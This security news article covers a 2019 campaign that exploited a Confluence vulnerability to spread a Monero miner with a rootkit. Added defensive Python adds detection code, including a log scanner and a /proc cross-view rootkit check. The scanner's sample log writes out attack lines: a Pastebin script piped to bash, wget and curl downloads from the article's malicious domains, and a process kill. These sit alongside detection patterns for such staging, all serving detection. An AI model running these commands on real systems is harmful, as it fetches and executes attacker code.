Attackers leverage Confluence Server vulnerability to spread Monero mining malware
May 8, 2019 | Malware and Vulnerabilities
- The malware comes packed with a rootkit that is used to hide the malicious activities of the attackers.
- The attack begins with attackers sending a command to download a shell script hosted on Pastebin.
Attackers have recently been exploiting a well-known Confluence Server and Data Center vulnerability to spread Monero mining malware. The malware comes packed with a rootkit that is used to hide the malicious activities of the attackers.
What’s the matter?
In a report, Augusto Remillano II and Robert Malagad from Trend Micro have revealed that the attackers are leveraging the vulnerability - CVE-2019-3396 - to deliver a Monero cryptocurrency miner with a rootkit component. The miner is detected as Coinminer.Linux.MALXMR.UWEJI.
How does the attack occur?
The attack begins when attackers send a command to download a shell script hosted on Pastebin. After killing some processes, that script downloads and runs a second shell script. The file fetched by the second script drops a third shell script, which is responsible for downloading a trojan dropper from the following servers:
- gwjyhs[.]com
- Img[.]sobot[.]com
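The chain above (a script pulled from Pastebin, further stages fetched from the two listed hosts, competing processes killed first) is the kind of thing a command or audit log shows before any miner binary lands. The following is an added detection example, not code from the Trend Micro report or the Cyware article; the log format is a constructed one (timestamp, user, command line), the sample lines and their URL paths are constructed, and the only indicators used are the generic "download from a Pastebin raw URL and pipe to a shell" pattern and the two defanged domains the article names.

```python
"""Scan a command log for download-and-execute staging and the article's domains.

Added example (not from Trend Micro or Cyware). Log format, sample lines and the
path components in the sample URLs are constructed for illustration.
"""
import re
from typing import Dict, List
from urllib.parse import urlparse

# Indicators taken from the article, kept defanged in source and normalised here.
ARTICLE_DOMAINS = [
    d.replace("[.]", ".").lower() for d in ("gwjyhs[.]com", "img[.]sobot[.]com")
]

# curl/wget followed (within the same command segment) by a URL.
DOWNLOADER = re.compile(r"\b(curl|wget)\b[^|;&]*?(https?://[^\s'\"]+)", re.I)
# Output of the downloader piped straight into a shell interpreter.
PIPE_TO_SHELL = re.compile(r"\|\s*(sh|bash)\b", re.I)
# Raw Pastebin content, the hosting used for the first-stage script in the article.
PASTEBIN_RAW = re.compile(r"^https?://pastebin\.com/raw/", re.I)
# The first stage kills processes before fetching the next one.
KILL = re.compile(r"\b(pkill|killall)\b", re.I)

# Constructed sample log: "<timestamp> <user> <command line>". EXAMPLEID is a placeholder.
SAMPLE_LOG = """\
2019-05-06T10:12:01Z confluence /bin/sh -c "curl -s https://pastebin.com/raw/EXAMPLEID | bash"
2019-05-06T10:12:03Z confluence wget -q http://gwjyhs.com/stage2.sh -O /tmp/.x/stage2.sh
2019-05-06T10:13:44Z confluence pkill -f xmrig
2019-05-06T10:14:00Z root apt-get update
2019-05-06T10:15:10Z confluence curl -O http://img.sobot.com/dropper
"""


def host_of(url: str) -> str:
    """Lower-cased hostname of a URL, or '' if it has none."""
    return (urlparse(url).hostname or "").lower()


def classify(cmd: str) -> List[str]:
    """Return the reasons a single command line is suspicious (empty list if none)."""
    reasons: List[str] = []
    for _tool, url in DOWNLOADER.findall(cmd):
        if PASTEBIN_RAW.match(url):
            reasons.append("pastebin raw download")
        host = host_of(url)
        for dom in ARTICLE_DOMAINS:
            if host == dom or host.endswith("." + dom):
                reasons.append(f"article IoC domain: {dom}")
    if PIPE_TO_SHELL.search(cmd):
        reasons.append("piped to shell")
    if KILL.search(cmd):
        reasons.append("process kill")
    return reasons


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Parse constructed log lines and return the flagged ones with their reasons."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        parts = line.split(" ", 2)   # timestamp, user, command line
        if len(parts) < 3:
            continue
        ts, user, cmd = parts
        reasons = classify(cmd)
        if reasons:
            hits.append({"time": ts, "user": user, "cmd": cmd, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit["time"], hit["user"], "|", ", ".join(hit["reasons"]), "|", hit["cmd"])
```

The two-domain list is deliberately small; on a real host the same `classify` logic runs unchanged over whatever the organisation's indicator feed supplies, and the generic "Pastebin raw content piped to a shell" reason fires regardless of which domains are listed.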
What is the purpose of the rootkit?
The rootkit used in the campaign is detected as Rootkit.Linux.KERBERDS.A. Its main aim is to hide the malware from detection.
“Unlike the older rootkit that only hooks the readdir function to hide the mining process, this new version hooks more functions. It hides not only the mining process but also certain files and network traffic. It is also capable of forging the machine’s CPU usage,” researchers explained.
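A rootkit that hides a process by hooking `readdir` only filters what a directory listing of `/proc` returns; looking up `/proc/<pid>` by path takes a different route and can still succeed. The cross-view check below is an added example, not code from the report or the article. It assumes a Linux host with procfs at `/proc` and that the hook only filters listings (the newer variant described above hooks further functions, so a clean result means "not detected", not "clean"); the `/etc/ld.so.preload` check reflects the common way user-mode hooks of this kind are loaded, which the article does not state for this sample.

```python
"""Cross-view detection of processes hidden from readdir() on /proc.

Added example (not from Trend Micro or Cyware). Assumes Linux procfs; the probe
function is injected so the comparison logic can be exercised on constructed data.
"""
import os
from typing import Callable, Dict, Iterable, Optional, Set

# Loading point for LD_PRELOAD-style hooks on most Linux distributions (assumption:
# the article does not say how this sample's rootkit is loaded).
LD_PRELOAD_FILE = "/etc/ld.so.preload"


def pids_from_listing(names: Iterable[str]) -> Set[int]:
    """PIDs as seen through a directory listing of /proc (the view a readdir hook filters)."""
    return {int(n) for n in names if n.isdigit()}


def pids_from_probe(pid_max: int, exists: Callable[[str], bool]) -> Set[int]:
    """PIDs found by looking up /proc/<pid> directly, bypassing the listing."""
    return {pid for pid in range(1, pid_max + 1) if exists(f"/proc/{pid}")}


def hidden_pids(listed: Set[int], probed: Set[int]) -> Set[int]:
    """PIDs reachable by path lookup but missing from the listing."""
    return probed - listed


def scan_procfs(pid_max: Optional[int] = None) -> Dict[str, object]:
    """Run the cross-view check on the live host and report the preload file, if any."""
    if pid_max is None:
        with open("/proc/sys/kernel/pid_max") as f:
            pid_max = int(f.read())
    listed = pids_from_listing(os.listdir("/proc"))
    probed = pids_from_probe(pid_max, os.path.isdir)
    # A process started between the listing and the probe would look hidden; a
    # second listing afterwards removes that race (a hidden PID stays absent).
    relisted = pids_from_listing(os.listdir("/proc"))
    hidden = hidden_pids(listed, probed) & hidden_pids(relisted, probed)
    preload = ""
    if os.path.exists(LD_PRELOAD_FILE):
        with open(LD_PRELOAD_FILE) as f:
            preload = f.read().strip()
    return {"hidden": sorted(hidden), "ld_so_preload": preload}


if __name__ == "__main__":
    result = scan_procfs()
    print("hidden PIDs:", result["hidden"] or "none found")
    print("/etc/ld.so.preload:", result["ld_so_preload"] or "absent or empty")
```

Because the hook described above also forges CPU usage, a quiet `top` is not evidence either way; the value of this check is that it reads the same kernel data through two different code paths and flags any disagreement for a closer look from outside the host (offline image, EDR kernel telemetry, or network-side mining traffic).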
Bottom line
The same vulnerability has been previously used to distribute GandCrab v5.2 and a variant of AESDDoS botnet. Given the wide exploitation of the vulnerability, Atlassian has released a security update to fix the issue. Thus, users are advised to apply the patch in order to stay safe from such attacks.